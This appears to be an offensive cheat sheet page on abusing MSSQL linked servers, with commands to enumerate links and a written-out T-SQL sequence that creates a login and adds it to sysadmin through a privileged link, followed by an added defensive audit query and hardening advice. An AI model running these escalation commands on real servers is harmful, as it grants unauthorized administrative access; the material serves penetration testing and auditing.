TLDRBins / MSSQL Linked Servers



Basic Commands

Hint: In MSSQL, escape a single quote (') inside a string literal by doubling it ('').

# Show current server
select @@servername
# Show linked servers
select srvname from sysservers;
# Show linked servers
enum_links

Execute Query between Linked Servers

# Execute query from current server to linked server
EXECUTE ('select @@version;') at [<LINKED_SERVER>];
# Execute query from linked server to current server
EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [<CURRENT_SERVER>]') at [<LINKED_SERVER>];

Abuse #1: Create Admin User from Privileged Linked Server

EXECUTE('EXECUTE(''CREATE LOGIN <USER> WITH PASSWORD = ''''<PASSWORD>'''';'') AT [<CURRENT_SERVER>]') AT [<LINKED_SERVER>]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''<USER>'''', ''''sysadmin'''''') AT [<CURRENT_SERVER>]') AT [<LINKED_SERVER>]
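
For reviewing an instance for the exposure Abuse #1 depends on, an added audit example (not part of the original page): it lists each linked server's RPC-out setting and login mapping, then the current sysadmin members, newest first. It uses only the standard catalog views sys.servers, sys.linked_logins, sys.server_principals and sys.server_role_members, and assumes the reviewing login is allowed to see server-level metadata.

```sql
-- Added audit example (T-SQL). Run on every instance that takes part in a link.

-- 1) Linked servers and the credentials each local login is mapped to.
--    Rows to review first: is_rpc_out_enabled = 1 (required for EXECUTE (...) AT [link])
--    combined with uses_self_credential = 0 and a remote_name that is privileged
--    on the remote side, especially when the mapping applies to all logins.
SELECT  s.name                 AS linked_server,
        s.data_source,
        s.is_rpc_out_enabled,
        s.is_data_access_enabled,
        CASE WHEN ll.local_principal_id = 0
             THEN N'<all logins>'            -- 0 = wildcard / public mapping
             ELSE p.name
        END                    AS local_login,
        ll.uses_self_credential,             -- 1 = caller's own credentials are used
        ll.remote_name,                      -- fixed remote login when the above is 0
        ll.modify_date         AS mapping_modified
FROM    sys.servers            AS s
JOIN    sys.linked_logins      AS ll ON ll.server_id   = s.server_id
LEFT JOIN sys.server_principals AS p ON p.principal_id = ll.local_principal_id
WHERE   s.is_linked = 1
ORDER BY s.name, local_login;

-- 2) Members of the sysadmin role, newest first, so a login created and
--    promoted through a link stands out by its create_date.
SELECT  m.name                 AS member_login,
        m.type_desc,
        m.is_disabled,
        m.create_date,
        m.modify_date
FROM    sys.server_role_members AS rm
JOIN    sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN    sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE   r.name = N'sysadmin'
ORDER BY m.create_date DESC;
```

Mappings that carry a fixed privileged remote login can be changed to pass the caller's own credentials or to a low-privilege login, and RPC out can be disabled on links that only need data access.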